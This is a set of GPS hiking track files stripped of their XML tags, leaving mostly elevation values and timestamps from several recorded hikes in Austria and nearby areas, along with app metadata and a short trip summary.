+2494.3
+
+
+2497.2
+
+
+2497.9
+
+
+2509.2
+
+
+2512.2
+
+
+2523.0
+
+
+2510.4
+
+
+2511.2
+
+
+2504.7
+
+
+2508.4
+
+
+2512.9
+
+
+2506.9
+
+
+2530.1
+
+
+2527.1
+
+
+2537.7
+
+
+2541.5
+
+
+2541.3
+
+
+2543.7
+
+
+2542.6
+
+
+2544.4
+
+
+2541.3
+
+
+2544.1
+
+
+2543.1
+
+
+2542.6
+
+
+2548.2
+
+
+2559.4
+
+
+2566.1
+
+
+2566.4
+
+
+2582.3
+
+
+2584.4
+
+
+2583.2
+
+
+2577.9
+
+
+2567.8
+
+
+2567.4
+
+
+2561.1
+
+
+2549.1
+
+
+2543.4
+
+
+2542.6
+
+
+2545.1
+
+
+2542.4
+
+
+2545.4
+
+
+2541.5
+
+
+2544.8
+
+
+2539.4
+
+
+2524.8
+
+
+2532.2
+
+
+2525.0
+
+
+2512.0
+
+
+2513.6
+
+
+2509.1
+
+
+2506.6
+
+
+2511.3
+
+
+2511.1
+
+
+2527.0
+
+
+2512.0
+
+
+2510.7
+
+
+2498.7
+
+
+2497.6
+
+
+2494.9
+
+
+2493.5
+
+
+2488.9
+
+
+2459.5
+
+
+2448.6
+
+
+2411.9
+
+
+2378.7
+
+
+2367.3
+
+
+2358.1
+
+
+2327.0
+
+
+2328.5
+
+
+2312.6
+
+
+2302.4
+
+
+2297.3
+
+
+2297.1
+
+
+2290.9
+
+
+2263.6
+
+
+2254.7
+
+
+2248.3
+
+
+2246.6
+ "
+"
+
+
+Tourenplanung am 6. Dezember 2016
+
+TemporaryUserGroup
+
+
+
+2016-12-06T17:11:01Z
+
+Tourenplanung am 6. Dezember 2016
+
+
+
+157.82562
+
+
+167.13117
+
+
+220.74952
+
+
+314.1449
+
+
+293.1787
+
+
+339.17237
+
+
+376.80728
+
+
+369.81682
+
+
+207.23686
+
+
+170.90057
+
+
+105.30196
+
+
+46.22518
+
+
+11.82509
+
+
+41.19238
+
+
+36.39179
+
+
+11.09813
+
+
+12.94019
+
+
+28.69552
+
+
+64.43588
+
+
+102.66808
+
+
+128.50967
+
+
+136.56321
+
+
+168.89371
+
+
+234.29382
+
+
+265.06487
+
+
+297.5384
+
+
+369.35701
+
+
+460.50139
+
+
+516.83812
+
+
+536.82079
+
+
+561.39363
+
+
+585.46961
+
+
+584.59604
+
+
+584.32383
+
+
+638.46199
+
+
+652.13638
+
+
+610.00372
+
+
+575.87188
+
+
+571.04037
+
+
+538.42405
+
+
+485.97133
+
+
+496.71864
+
+
+434.93157
+
+
+383.33893
+
+
+309.20505
+
+
+228.96738
+
+
+193.32873
+
+
+161.95609
+
+
+157.79821
+
+
+158.39
+
+
+157.82562
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2018-03-25T12:50:16Z
+
+2018-03-25 14:50:14
+
+
+
+
+
+
+1821.99
+2018-03-25T09:27:23Z
+
+
+1815.9
+2018-03-25T09:31:13Z
+
+
+1806.86
+2018-03-25T09:33:03Z
+
+
+1808.44
+2018-03-25T09:35:27Z
+
+
+1817.19
+2018-03-25T09:36:54Z
+
+
+1833.2
+2018-03-25T09:38:46Z
+
+
+1847.87
+2018-03-25T09:41:17Z
+
+
+1852.21
+2018-03-25T09:43:04Z
+
+
+1859.68
+2018-03-25T09:45:35Z
+
+
+1858.93
+2018-03-25T09:49:00Z
+
+
+1863.31
+2018-03-25T09:50:27Z
+
+
+1918.9
+2018-03-25T09:57:13Z
+
+
+1946.98
+2018-03-25T10:00:17Z
+
+
+1962.71
+2018-03-25T10:02:25Z
+
+
+1992.26
+2018-03-25T10:04:35Z
+
+
+1998.72
+2018-03-25T10:05:22Z
+
+
+2026.98
+2018-03-25T10:07:41Z
+
+
+2045.16
+2018-03-25T10:09:11Z
+
+
+2086.36
+2018-03-25T10:13:29Z
+
+
+2101.47
+2018-03-25T10:17:20Z
+
+
+2109.38
+2018-03-25T10:19:16Z
+
+
+2130.39
+2018-03-25T10:22:05Z
+
+
+2136.96
+2018-03-25T10:26:50Z
+
+
+2141.53
+2018-03-25T10:27:45Z
+
+
+2135.52
+2018-03-25T10:29:41Z
+
+
+2138.35
+2018-03-25T10:31:52Z
+
+
+2131.97
+2018-03-25T10:33:16Z
+
+
+2144.04
+2018-03-25T10:37:19Z
+
+
+2140.8
+2018-03-25T10:40:01Z
+
+
+2144.46
+2018-03-25T10:40:41Z
+
+
+2160.31
+2018-03-25T10:43:30Z
+
+
+2170.27
+2018-03-25T10:45:07Z
+
+
+2159.28
+2018-03-25T10:46:56Z
+
+
+2152.93
+2018-03-25T10:49:02Z
+
+
+2159.57
+2018-03-25T11:00:35Z
+
+
+2160.26
+2018-03-25T11:00:50Z
+
+
+2151.31
+2018-03-25T11:01:46Z
+
+
+2144.82
+2018-03-25T11:02:39Z
+
+
+2142.31
+2018-03-25T11:02:59Z
+
+
+2142.07
+2018-03-25T11:05:11Z
+
+
+2128.94
+2018-03-25T11:08:12Z
+
+
+2131.45
+2018-03-25T11:11:34Z
+
+
+2120.06
+2018-03-25T11:13:24Z
+
+
+2112.96
+2018-03-25T11:14:34Z
+
+
+2104.77
+2018-03-25T11:15:09Z
+
+
+2101.25
+2018-03-25T11:15:36Z
+
+
+2095.55
+2018-03-25T11:19:04Z
+
+
+2097.63
+2018-03-25T11:19:38Z
+
+
+2097.13
+2018-03-25T11:21:24Z
+
+
+2095.45
+2018-03-25T11:22:18Z
+
+
+2089.36
+2018-03-25T11:25:03Z
+
+
+2086.11
+2018-03-25T11:26:44Z
+
+
+2072.3
+2018-03-25T11:28:04Z
+
+
+2060.83
+2018-03-25T11:29:15Z
+
+
+2065.25
+2018-03-25T11:33:34Z
+
+
+2001.57
+2018-03-25T11:37:21Z
+
+
+1943.86
+2018-03-25T11:41:08Z
+
+
+1917.81
+2018-03-25T11:43:41Z
+
+
+1915.42
+2018-03-25T12:16:30Z
+
+
+1920.77
+2018-03-25T12:24:19Z
+
+
+1890.72
+2018-03-25T12:26:04Z
+
+
+1863.15
+2018-03-25T12:27:29Z
+
+
+1849.0
+2018-03-25T12:31:11Z
+
+
+1854.51
+2018-03-25T12:32:25Z
+
+
+1842.79
+2018-03-25T12:33:12Z
+
+
+1831.33
+2018-03-25T12:33:52Z
+
+
+1825.35
+2018-03-25T12:34:13Z
+
+
+1807.44
+2018-03-25T12:35:43Z
+
+
+1800.15
+2018-03-25T12:36:40Z
+
+
+1797.04
+2018-03-25T12:37:47Z
+
+
+1807.62
+2018-03-25T12:40:16Z
+
+
+1807.56
+2018-03-25T12:50:10Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2017-02-26T07:46:34Z
+
+GPSies Track on GPSies.com
+
+
+
+1116.0
+2010-01-01T00:00:00Z
+
+
+1122.0
+2010-01-01T00:00:21Z
+
+
+1123.0
+2010-01-01T00:00:41Z
+
+
+1130.0
+2010-01-01T00:01:05Z
+
+
+1143.0
+2010-01-01T00:01:30Z
+
+
+1147.0
+2010-01-01T00:01:45Z
+
+
+1171.0
+2010-01-01T00:03:17Z
+
+
+1198.0
+2010-01-01T00:04:41Z
+
+
+1205.0
+2010-01-01T00:05:18Z
+
+
+1220.0
+2010-01-01T00:06:18Z
+
+
+1233.0
+2010-01-01T00:06:41Z
+
+
+1258.0
+2010-01-01T00:07:24Z
+
+
+1273.0
+2010-01-01T00:07:43Z
+
+
+1280.0
+2010-01-01T00:08:04Z
+
+
+1297.0
+2010-01-01T00:08:22Z
+
+
+1310.0
+2010-01-01T00:08:40Z
+
+
+1322.0
+2010-01-01T00:09:07Z
+
+
+1331.0
+2010-01-01T00:09:24Z
+
+
+1340.0
+2010-01-01T00:09:32Z
+
+
+1340.0
+2010-01-01T00:09:41Z
+
+
+1351.0
+2010-01-01T00:09:50Z
+
+
+1369.0
+2010-01-01T00:10:26Z
+
+
+1377.0
+2010-01-01T00:10:34Z
+
+
+1391.0
+2010-01-01T00:11:07Z
+
+
+1403.0
+2010-01-01T00:11:21Z
+
+
+1424.0
+2010-01-01T00:11:41Z
+
+
+1426.0
+2010-01-01T00:11:50Z
+
+
+1450.0
+2010-01-01T00:12:16Z
+
+
+1486.0
+2010-01-01T00:12:53Z
+
+
+1501.0
+2010-01-01T00:13:07Z
+
+
+1503.0
+2010-01-01T00:13:15Z
+
+
+1518.0
+2010-01-01T00:13:42Z
+
+
+1532.0
+2010-01-01T00:14:10Z
+
+
+1551.0
+2010-01-01T00:14:32Z
+
+
+1559.0
+2010-01-01T00:14:43Z
+
+
+1575.0
+2010-01-01T00:14:59Z
+
+
+1576.0
+2010-01-01T00:15:07Z
+
+
+1593.0
+2010-01-01T00:15:34Z
+
+
+1604.0
+2010-01-01T00:15:45Z
+
+
+1633.0
+2010-01-01T00:16:08Z
+
+
+1639.0
+2010-01-01T00:16:15Z
+
+
+1643.0
+2010-01-01T00:16:24Z
+
+
+1657.0
+2010-01-01T00:16:38Z
+
+
+1675.0
+2010-01-01T00:16:53Z
+
+
+1693.0
+2010-01-01T00:17:18Z
+
+
+1707.0
+2010-01-01T00:17:32Z
+
+
+1716.0
+2010-01-01T00:18:00Z
+
+
+1750.0
+2010-01-01T00:18:49Z
+
+
+1758.0
+2010-01-01T00:18:57Z
+
+
+1793.0
+2010-01-01T00:19:38Z
+
+
+1805.0
+2010-01-01T00:19:52Z
+
+
+1852.0
+2010-01-01T00:20:42Z
+ "
+"
+
+
+
+Pavel Fuemm
+
+
+
+
+Endomondo
+2015-06-13T19:24:19Z
+
+Sunsetwalk am Laubberg
+http://www.endomondo.com/
+
+Sunsetwalk am Laubberg
+HIKING
+
+
+2015-06-13T16:51:30Z
+
+
+474.0
+2015-06-13T16:52:12Z
+
+
+2015-06-13T16:53:22Z
+
+
+
+2015-06-13T16:53:32Z
+
+
+2015-06-13T16:53:50Z
+
+
+
+2015-06-13T16:54:13Z
+
+
+2015-06-13T16:54:26Z
+
+
+
+2015-06-13T16:54:43Z
+
+
+2015-06-13T16:55:16Z
+
+
+
+2015-06-13T16:55:32Z
+
+
+481.0
+2015-06-13T16:56:17Z
+
+
+2015-06-13T16:57:27Z
+
+
+
+2015-06-13T16:57:56Z
+
+
+2015-06-13T16:58:23Z
+
+
+
+2015-06-13T16:58:27Z
+
+
+2015-06-13T16:59:20Z
+
+
+
+2015-06-13T17:00:02Z
+
+
+498.0
+2015-06-13T17:00:54Z
+
+
+2015-06-13T17:03:08Z
+
+
+
+2015-06-13T17:03:20Z
+
+
+2015-06-13T17:05:38Z
+
+
+
+2015-06-13T17:05:41Z
+
+
+2015-06-13T17:06:07Z
+
+
+
+2015-06-13T17:06:46Z
+
+
+2015-06-13T17:07:54Z
+
+
+
+2015-06-13T17:08:35Z
+
+
+516.0
+2015-06-13T17:09:28Z
+
+
+529.0
+2015-06-13T17:10:18Z
+
+
+2015-06-13T17:10:37Z
+
+
+
+2015-06-13T17:11:19Z
+
+
+2015-06-13T17:11:26Z
+
+
+
+2015-06-13T17:12:26Z
+
+
+2015-06-13T17:12:36Z
+
+
+
+2015-06-13T17:27:57Z
+
+
+2015-06-13T17:29:17Z
+
+
+
+2015-06-13T17:29:59Z
+
+
+2015-06-13T17:30:08Z
+
+
+
+2015-06-13T17:30:17Z
+
+
+2015-06-13T17:30:38Z
+
+
+
+2015-06-13T17:30:43Z
+
+
+2015-06-13T17:31:39Z
+
+
+
+2015-06-13T17:32:31Z
+
+
+2015-06-13T17:32:51Z
+
+
+
+2015-06-13T17:32:55Z
+
+
+2015-06-13T17:33:23Z
+
+
+
+2015-06-13T17:34:34Z
+
+
+2015-06-13T17:34:59Z
+
+
+
+2015-06-13T17:35:06Z
+
+
+515.0
+2015-06-13T17:35:48Z
+
+
+512.0
+2015-06-13T17:38:06Z
+
+
+508.0
+2015-06-13T17:38:38Z
+
+
+505.0
+2015-06-13T17:38:56Z
+
+
+2015-06-13T17:40:43Z
+
+
+
+2015-06-13T17:41:08Z
+
+
+2015-06-13T17:41:25Z
+
+
+
+2015-06-13T17:41:41Z
+
+
+2015-06-13T17:41:56Z
+
+
+
+2015-06-13T17:41:58Z
+
+
+2015-06-13T17:43:20Z
+
+
+
+2015-06-13T17:43:28Z
+
+
+2015-06-13T17:44:07Z
+
+
+
+2015-06-13T17:44:14Z
+
+
+2015-06-13T17:44:22Z
+
+
+
+2015-06-13T17:44:34Z
+
+
+2015-06-13T17:45:07Z
+
+
+
+2015-06-13T17:46:01Z
+
+
+471.0
+2015-06-13T17:46:46Z
+
+
+2015-06-13T17:47:50Z
+
+
+
+2015-06-13T17:48:06Z
+
+
+463.0
+2015-06-13T17:48:20Z
+
+
+2015-06-13T17:49:08Z
+
+
+
+2015-06-13T17:49:17Z
+
+
+444.0
+2015-06-13T17:51:17Z
+
+
+439.0
+2015-06-13T17:52:01Z
+
+
+433.0
+2015-06-13T17:53:47Z
+
+
+2015-06-13T17:54:39Z
+
+
+
+2015-06-13T17:56:14Z
+
+
+2015-06-13T17:56:18Z
+
+
+
+2015-06-13T17:56:19Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+2015-10-21 14:56
+
+
+
+
+
+OruxMaps
+2015-10-21T12:56:25Z
+
+
+2015-10-21 14:56
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 2015-10-21 14:56</h2><br /><p>Startzeit: 10/21/2015 14:56</p><p>Zielzeit: 10/21/2015 16:20</p><p>Strecke: 2,9km (01:24)</p><p>Bewegungszeit: 01:00</p><p>Ø-Geschwindigkeit: 2km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 8,1km/h</p><p>Minimale Höhe: 1979m</p><p>Maximale Höhe: 2741m</p><p>Steig-Geschw.: 112,8m/h</p><p>Sink-Geschw.: -541,9m/h</p><p>Aufstieg: 2m</p><p>Abstieg: -626m</p><p>Steigzeit: 00:01</p><p>Sinkzeit: 01:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2741.33
+2015-10-21T12:56:26Z
+
+
+2709.62
+2015-10-21T13:03:58Z
+
+
+2660.37
+2015-10-21T13:07:34Z
+
+
+2655.23
+2015-10-21T13:08:10Z
+
+
+2617.18
+2015-10-21T13:11:06Z
+
+
+2571.18
+2015-10-21T13:14:32Z
+
+
+2545.21
+2015-10-21T13:16:51Z
+
+
+2528.36
+2015-10-21T13:18:46Z
+
+
+2513.21
+2015-10-21T13:19:39Z
+
+
+2509.58
+2015-10-21T13:20:10Z
+
+
+2496.24
+2015-10-21T13:20:59Z
+
+
+2492.21
+2015-10-21T13:21:24Z
+
+
+2474.61
+2015-10-21T13:22:40Z
+
+
+2443.11
+2015-10-21T13:25:22Z
+
+
+2431.62
+2015-10-21T13:26:29Z
+
+
+2390.21
+2015-10-21T13:29:39Z
+
+
+2372.72
+2015-10-21T13:30:53Z
+
+
+2365.71
+2015-10-21T13:31:35Z
+
+
+2349.1
+2015-10-21T13:32:48Z
+
+
+2334.86
+2015-10-21T13:47:17Z
+
+
+2283.23
+2015-10-21T13:50:39Z
+
+
+2148.22
+2015-10-21T14:04:11Z
+
+
+2135.63
+2015-10-21T14:05:42Z
+
+
+2110.83
+2015-10-21T14:06:38Z
+
+
+2100.34
+2015-10-21T14:07:23Z
+
+
+2088.69
+2015-10-21T14:10:46Z
+
+
+2060.66
+2015-10-21T14:13:35Z
+
+
+2047.33
+2015-10-21T14:15:05Z
+
+
+1998.39
+2015-10-21T14:19:30Z
+
+
+1988.61
+2015-10-21T14:20:06Z
+
+
+1979.71
+2015-10-21T14:20:34Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+781.599975585938
+2013-12-28T07:23:58Z
+
+
+785.799987792969
+2013-12-28T07:26:09Z
+
+
+785.799987792969
+2013-12-28T07:26:40Z
+
+
+788.0
+2013-12-28T07:28:08Z
+
+
+788.0
+2013-12-28T07:28:37Z
+
+
+788.0
+2013-12-28T07:29:24Z
+
+
+788.0
+2013-12-28T07:30:22Z
+
+
+790.0
+2013-12-28T07:31:09Z
+
+
+796.200012207031
+2013-12-28T07:33:07Z
+
+
+802.200012207031
+2013-12-28T07:34:27Z
+
+
+802.200012207031
+2013-12-28T07:34:55Z
+
+
+805.599975585938
+2013-12-28T07:35:23Z
+
+
+810.599975585938
+2013-12-28T07:36:04Z
+
+
+818.799987792969
+2013-12-28T07:37:00Z
+
+
+821.799987792969
+2013-12-28T07:37:32Z
+
+
+828.599975585938
+2013-12-28T07:38:28Z
+
+
+831.400024414062
+2013-12-28T07:38:58Z
+
+
+835.599975585938
+2013-12-28T07:39:33Z
+
+
+847.599975585938
+2013-12-28T07:41:07Z
+
+
+856.599975585938
+2013-12-28T07:42:08Z
+
+
+863.200012207031
+2013-12-28T07:42:57Z
+
+
+871.599975585938
+2013-12-28T07:43:48Z
+
+
+886.0
+2013-12-28T07:46:51Z
+
+
+904.400024414062
+2013-12-28T07:50:14Z
+
+
+908.599975585938
+2013-12-28T07:51:08Z
+
+
+914.799987792969
+2013-12-28T07:52:12Z
+
+
+921.0
+2013-12-28T07:54:18Z
+
+
+923.400024414062
+2013-12-28T07:54:44Z
+
+
+939.0
+2013-12-28T07:56:33Z
+
+
+944.400024414062
+2013-12-28T07:57:36Z
+
+
+970.599975585938
+2013-12-28T08:01:00Z
+
+
+976.599975585938
+2013-12-28T08:01:57Z
+
+
+982.799987792969
+2013-12-28T08:02:43Z
+
+
+990.400024414062
+2013-12-28T08:03:54Z
+
+
+998.599975585938
+2013-12-28T08:06:47Z
+
+
+1007.59997558594
+2013-12-28T08:08:00Z
+
+
+1007.59997558594
+2013-12-28T08:08:13Z
+
+
+1052.59997558594
+2013-12-28T08:12:36Z
+
+
+1066.59997558594
+2013-12-28T08:15:27Z
+
+
+1068.80004882812
+2013-12-28T08:16:15Z
+
+
+1070.80004882812
+2013-12-28T08:17:03Z
+
+
+1072.80004882812
+2013-12-28T08:17:28Z
+
+
+1077.0
+2013-12-28T08:18:26Z
+
+
+1100.0
+2013-12-28T08:20:03Z
+
+
+1163.80004882812
+2013-12-28T08:24:42Z
+
+
+1168.40002441406
+2013-12-28T08:25:32Z
+
+
+1208.40002441406
+2013-12-28T08:28:49Z
+
+
+1232.80004882812
+2013-12-28T08:32:02Z
+
+
+1278.40002441406
+2013-12-28T08:36:27Z
+
+
+1290.19995117188
+2013-12-28T08:37:35Z
+
+
+1300.80004882812
+2013-12-28T08:38:25Z
+
+
+1320.40002441406
+2013-12-28T08:40:11Z
+
+
+1333.19995117188
+2013-12-28T08:41:10Z
+
+
+1357.59997558594
+2013-12-28T08:43:19Z
+
+
+1381.40002441406
+2013-12-28T08:45:18Z
+
+
+1460.40002441406
+2013-12-28T08:53:29Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+812.400024414062
+2015-08-06T05:07:36Z
+
+
+815.400024414062
+2015-08-06T05:08:09Z
+
+
+811.200012207031
+2015-08-06T05:08:53Z
+
+
+809.400024414062
+2015-08-06T05:08:58Z
+
+
+807.799987792969
+2015-08-06T05:09:27Z
+
+
+807.799987792969
+2015-08-06T05:09:57Z
+
+
+807.799987792969
+2015-08-06T05:10:14Z
+
+
+807.799987792969
+2015-08-06T05:10:20Z
+
+
+807.799987792969
+2015-08-06T05:10:43Z
+
+
+807.799987792969
+2015-08-06T05:11:03Z
+
+
+807.799987792969
+2015-08-06T05:11:18Z
+
+
+807.799987792969
+2015-08-06T05:11:29Z
+
+
+813.599975585938
+2015-08-06T05:12:43Z
+
+
+814.400024414062
+2015-08-06T05:13:30Z
+
+
+818.200012207031
+2015-08-06T05:14:12Z
+
+
+822.400024414062
+2015-08-06T05:14:51Z
+
+
+824.400024414062
+2015-08-06T05:15:13Z
+
+
+826.599975585938
+2015-08-06T05:15:48Z
+
+
+830.799987792969
+2015-08-06T05:16:28Z
+
+
+832.799987792969
+2015-08-06T05:16:51Z
+
+
+835.0
+2015-08-06T05:17:15Z
+
+
+841.200012207031
+2015-08-06T05:18:04Z
+
+
+846.200012207031
+2015-08-06T05:18:57Z
+
+
+853.799987792969
+2015-08-06T05:19:36Z
+
+
+855.799987792969
+2015-08-06T05:20:09Z
+
+
+856.200012207031
+2015-08-06T05:20:24Z
+
+
+873.200012207031
+2015-08-06T05:21:56Z
+
+
+906.599975585938
+2015-08-06T05:24:33Z
+
+
+917.599975585938
+2015-08-06T05:25:27Z
+
+
+944.400024414062
+2015-08-06T05:27:46Z
+
+
+948.599975585938
+2015-08-06T05:28:36Z
+
+
+948.599975585938
+2015-08-06T05:29:03Z
+
+
+948.599975585938
+2015-08-06T05:29:49Z
+
+
+952.400024414062
+2015-08-06T05:30:38Z
+
+
+957.0
+2015-08-06T05:31:18Z
+
+
+959.0
+2015-08-06T05:32:09Z
+
+
+963.200012207031
+2015-08-06T05:32:38Z
+
+
+965.200012207031
+2015-08-06T05:32:56Z
+
+
+969.200012207031
+2015-08-06T05:33:27Z
+
+
+981.200012207031
+2015-08-06T05:34:35Z
+
+
+987.799987792969
+2015-08-06T05:35:04Z
+
+
+1000.59997558594
+2015-08-06T05:36:00Z
+
+
+1019.40002441406
+2015-08-06T05:37:40Z
+
+
+1025.19995117188
+2015-08-06T05:38:09Z
+
+
+1036.0
+2015-08-06T05:39:01Z
+
+
+1043.80004882812
+2015-08-06T05:39:37Z
+
+
+1055.0
+2015-08-06T05:40:38Z
+
+
+1050.40002441406
+2015-08-06T05:41:15Z
+
+
+1055.40002441406
+2015-08-06T05:42:09Z
+
+
+1058.59997558594
+2015-08-06T05:42:45Z
+
+
+1061.19995117188
+2015-08-06T05:43:27Z
+
+
+1067.0
+2015-08-06T05:44:07Z
+
+
+1073.19995117188
+2015-08-06T05:44:34Z
+
+
+1077.0
+2015-08-06T05:45:13Z
+
+
+1085.80004882812
+2015-08-06T05:46:07Z
+
+
+1096.59997558594
+2015-08-06T05:47:06Z
+
+
+1109.19995117188
+2015-08-06T05:48:14Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-04-09T13:38:45Z
+
+
+Track
+
+
+
+
+
+
+893.58
+2016-04-04T09:33:02Z
+
+
+893.59
+2016-04-04T09:34:00Z
+
+
+897.9
+2016-04-04T09:36:26Z
+
+
+906.87
+2016-04-04T09:38:10Z
+
+
+913.75
+2016-04-04T09:39:50Z
+
+
+926.51
+2016-04-04T09:43:17Z
+
+
+936.86
+2016-04-04T09:45:05Z
+
+
+934.79
+2016-04-04T09:46:32Z
+
+
+931.39
+2016-04-04T09:48:26Z
+
+
+929.24
+2016-04-04T09:49:22Z
+
+
+951.36
+2016-04-04T09:55:07Z
+
+
+942.64
+2016-04-04T09:59:59Z
+
+
+942.31
+2016-04-04T10:01:45Z
+
+
+943.14
+2016-04-04T10:03:43Z
+
+
+936.85
+2016-04-04T10:05:53Z
+
+
+939.28
+2016-04-04T10:09:03Z
+
+
+942.51
+2016-04-04T10:12:39Z
+
+
+949.03
+2016-04-04T10:15:56Z
+ "
+"
+
+
+KOMPASS Digital Map Track
+
+
+
+
+2015-12-28T15:07:41Z
+
+
+Leobner Mauer
+
+
+
+
+
+
+1226.67
+1970-01-01T00:00:00Z
+
+
+1223.12
+1970-01-01T00:00:00Z
+
+
+1224.83
+1970-01-01T00:00:00Z
+
+
+1228.15
+1970-01-01T00:00:00Z
+
+
+1254.79
+1970-01-01T00:00:00Z
+
+
+1267.78
+1970-01-01T00:00:00Z
+
+
+1289.71
+1970-01-01T00:00:00Z
+
+
+1288.23
+1970-01-01T00:00:00Z
+
+
+1319.06
+1970-01-01T00:00:00Z
+
+
+1337.72
+1970-01-01T00:00:00Z
+
+
+1360.7
+1970-01-01T00:00:00Z
+
+
+1345.0
+1970-01-01T00:00:00Z
+
+
+1350.05
+1970-01-01T00:00:00Z
+
+
+1360.48
+1970-01-01T00:00:00Z
+
+
+1389.79
+1970-01-01T00:00:00Z
+
+
+1392.16
+1970-01-01T00:00:00Z
+
+
+1441.04
+1970-01-01T00:00:00Z
+
+
+1477.04
+1970-01-01T00:00:00Z
+
+
+1517.13
+1970-01-01T00:00:00Z
+
+
+1608.63
+1970-01-01T00:00:00Z
+
+
+1618.62
+1970-01-01T00:00:00Z
+
+
+1619.39
+1970-01-01T00:00:00Z
+
+
+1672.23
+1970-01-01T00:00:00Z
+
+
+1661.02
+1970-01-01T00:00:00Z
+
+
+1667.7
+1970-01-01T00:00:00Z
+
+
+1700.46
+1970-01-01T00:00:00Z
+
+
+1701.06
+1970-01-01T00:00:00Z
+
+
+1757.65
+1970-01-01T00:00:00Z
+
+
+1779.88
+1970-01-01T00:00:00Z
+
+
+1775.81
+1970-01-01T00:00:00Z
+
+
+1760.42
+1970-01-01T00:00:00Z
+
+
+1804.05
+1970-01-01T00:00:00Z
+
+
+1820.85
+1970-01-01T00:00:00Z
+
+
+1838.74
+1970-01-01T00:00:00Z
+
+
+1839.43
+1970-01-01T00:00:00Z
+
+
+1860.0
+1970-01-01T00:00:00Z
+
+
+1854.34
+1970-01-01T00:00:00Z
+
+
+1839.43
+1970-01-01T00:00:00Z
+
+
+1838.54
+1970-01-01T00:00:00Z
+
+
+1822.63
+1970-01-01T00:00:00Z
+
+
+1815.49
+1970-01-01T00:00:00Z
+
+
+1769.57
+1970-01-01T00:00:00Z
+
+
+1773.62
+1970-01-01T00:00:00Z
+
+
+1780.49
+1970-01-01T00:00:00Z
+
+
+1758.13
+1970-01-01T00:00:00Z
+
+
+1713.56
+1970-01-01T00:00:00Z
+
+
+1696.25
+1970-01-01T00:00:00Z
+
+
+1667.31
+1970-01-01T00:00:00Z
+
+
+1660.89
+1970-01-01T00:00:00Z
+
+
+1665.3
+1970-01-01T00:00:00Z
+
+
+1659.24
+1970-01-01T00:00:00Z
+
+
+1663.79
+1970-01-01T00:00:00Z
+
+
+1648.24
+1970-01-01T00:00:00Z
+
+
+1623.39
+1970-01-01T00:00:00Z
+
+
+1592.97
+1970-01-01T00:00:00Z
+
+
+1592.45
+1970-01-01T00:00:00Z
+
+
+1579.92
+1970-01-01T00:00:00Z
+
+
+1572.35
+1970-01-01T00:00:00Z
+
+
+1581.5
+1970-01-01T00:00:00Z
+
+
+1589.17
+1970-01-01T00:00:00Z
+
+
+1580.07
+1970-01-01T00:00:00Z
+
+
+1572.1
+1970-01-01T00:00:00Z
+
+
+1539.59
+1970-01-01T00:00:00Z
+
+
+1533.37
+1970-01-01T00:00:00Z
+
+
+1515.59
+1970-01-01T00:00:00Z
+
+
+1487.09
+1970-01-01T00:00:00Z
+
+
+1479.05
+1970-01-01T00:00:00Z
+
+
+1460.89
+1970-01-01T00:00:00Z
+
+
+1412.52
+1970-01-01T00:00:00Z
+
+
+1397.39
+1970-01-01T00:00:00Z
+
+
+1374.47
+1970-01-01T00:00:00Z
+
+
+1323.56
+1970-01-01T00:00:00Z
+
+
+1316.16
+1970-01-01T00:00:00Z
+
+
+1278.36
+1970-01-01T00:00:00Z
+
+
+1249.72
+1970-01-01T00:00:00Z
+
+
+1231.28
+1970-01-01T00:00:00Z
+
+
+1227.86
+1970-01-01T00:00:00Z
+
+
+1224.81
+1970-01-01T00:00:00Z
+
+
+1224.73
+1970-01-01T00:00:00Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-11-23T14:38:45Z
+
+
+2014-11-23 12:02:25
+Escursione autunnale senza neve.
+Solo io.
+
+
+
+
+
+
+747.51
+2014-11-23T08:43:20Z
+
+
+737.55
+2014-11-23T08:44:00Z
+
+
+740.06
+2014-11-23T08:44:24Z
+
+
+745.27
+2014-11-23T08:45:31Z
+
+
+749.82
+2014-11-23T08:46:25Z
+
+
+756.54
+2014-11-23T08:47:03Z
+
+
+768.13
+2014-11-23T08:50:06Z
+
+
+771.2
+2014-11-23T08:50:43Z
+
+
+777.48
+2014-11-23T08:51:12Z
+
+
+791.79
+2014-11-23T08:53:14Z
+
+
+799.19
+2014-11-23T08:54:35Z
+
+
+799.58
+2014-11-23T08:55:05Z
+
+
+800.23
+2014-11-23T08:56:00Z
+
+
+806.28
+2014-11-23T08:57:02Z
+
+
+818.66
+2014-11-23T08:58:33Z
+
+
+823.05
+2014-11-23T08:59:10Z
+
+
+831.08
+2014-11-23T09:00:09Z
+
+
+843.21
+2014-11-23T09:01:52Z
+
+
+841.62
+2014-11-23T09:04:13Z
+
+
+863.98
+2014-11-23T09:06:54Z
+
+
+880.5
+2014-11-23T09:09:03Z
+
+
+946.45
+2014-11-23T09:16:16Z
+
+
+1000.54
+2014-11-23T09:32:12Z
+
+
+1006.55
+2014-11-23T09:34:29Z
+
+
+1001.66
+2014-11-23T09:36:28Z
+
+
+981.91
+2014-11-23T09:42:14Z
+
+
+1016.3
+2014-11-23T09:47:09Z
+
+
+1001.34
+2014-11-23T09:49:00Z
+
+
+1005.13
+2014-11-23T09:51:40Z
+
+
+1003.7
